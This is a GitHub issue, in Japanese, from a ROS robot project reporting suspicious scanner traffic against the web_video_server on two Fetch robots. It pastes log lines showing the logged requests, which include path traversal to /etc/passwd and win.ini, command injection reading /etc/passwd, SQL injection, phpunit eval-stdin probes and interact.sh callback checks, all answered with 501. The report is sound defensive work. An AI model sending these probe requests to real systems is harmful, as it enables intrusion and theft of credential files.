[fetch15][fetch1075] web_video_serverに不審なアクセス

昨日から不審なアクセスがあるのをjsk-fetch-startup.logで確認しました
IP 45.67.228.5

fetch15

127.0.0.1 - - [12/Oct/2022 21:34:56] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 21:34:56] "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 21:34:57] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 21:34:57] "GET /./../../../../../../../../../../windows/win.ini HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 21:34:58] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 21:34:58] "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 21:34:59] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 21:34:59] "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 21:35:00] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 21:35:00] "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 21:35:00] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 21:35:00] "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 21:35:01] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 21:35:01] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1" 501 -

fetch1075

fetch@fetch1075:~$ sudo tail -f -n 10000 /var/log/ros/jsk-fetch-startup.log | grep GET
127.0.0.1 - - [12/Oct/2022 13:33:27] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:33:27] "GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/ HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:35:07] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:35:07] "GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:36:48] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:36:48] "GET /admin/view_car.php?id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:36:52] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:36:52] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:36:53] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:36:53] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:36:56] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:36:56] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:36:57] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:36:57] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:36:58] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:36:58] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:36:58] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:36:58] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:38:06] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:38:06] "GET /jsonapi/user/user HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:41:13] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:41:13] "GET /js/elfinder.min.js HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:41:14] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:41:14] "GET /js/elFinder.version.js HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:43:15] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:43:15] "GET /?c=../../../../../../etc/passwd%00 HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:43:17] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:43:17] "GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1" 501 -
[INFO] [1665549808.200673] [/server_name:rosout]:  - At 2022-10-12 13:30:25.751983, Active state is GET-LIGHT-ON
  0%|          | 0/8060 [00:00<?, ?it/s]127.0.0.1 - - [12/Oct/2022 13:46:28] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:46:28] "GET /ipython/tree HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:46:29] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:46:29] "GET /Default.aspx HTTP/1.1" 501 -
  0%|          | 0/5957 [00:00<?, ?it/s]127.0.0.1 - - [12/Oct/2022 13:48:54] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:48:54] "GET /ads/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:48:54] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:48:54] "GET /adserve/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:48:55] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:48:55] "GET /adserver/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:48:55] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:48:55] "GET /openx/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:48:56] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:48:56] "GET /revive/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:48:56] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:48:56] "GET /www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 13:59:12] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 13:59:12] "GET /kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11 HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:05:49] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:05:49] "GET /whoAmI/ HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:05:50] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:05:50] "GET /whoAmI/ HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:06:16] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:06:16] "GET /config/cam_portal.cgi HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:10:12] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:10:12] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:17:32] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:17:32] "GET /testing-put.txt HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:19:07] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:19:07] "GET /wan.htm HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:19:13] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:19:13] "GET /openwin.php?redirurl=http://interact.sh HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:20:56] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:20:56] "GET /pme/media/ HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:29:33] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:29:33] "GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:30:10] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:30:10] "GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:33:13] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:33:13] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:35:05] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:35:05] "GET /config/ HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:38:17] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:38:17] "GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:38:18] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:38:18] "GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:43:03] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:43:03] "GET /+CSCOE+/session_password.html HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:48:59] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:48:59] "GET /test.txt HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:52:27] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:52:27] "GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:55:01] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:55:01] "GET /db_dump.php HTTP/1.1" 501 -
127.0.0.1 - - [12/Oct/2022 14:56:23] code 501, message Unsupported method ('GET')
127.0.0.1 - - [12/Oct/2022 14:56:23] "GET /core/config/databases.yml HTTP/1.1" 501 -

cc. @iory @708yamaguchi

jsk-ros-pkg / jsk_robot

[fetch15][fetch1075] web_video_serverに不審なアクセス #1663

fetch15

fetch1075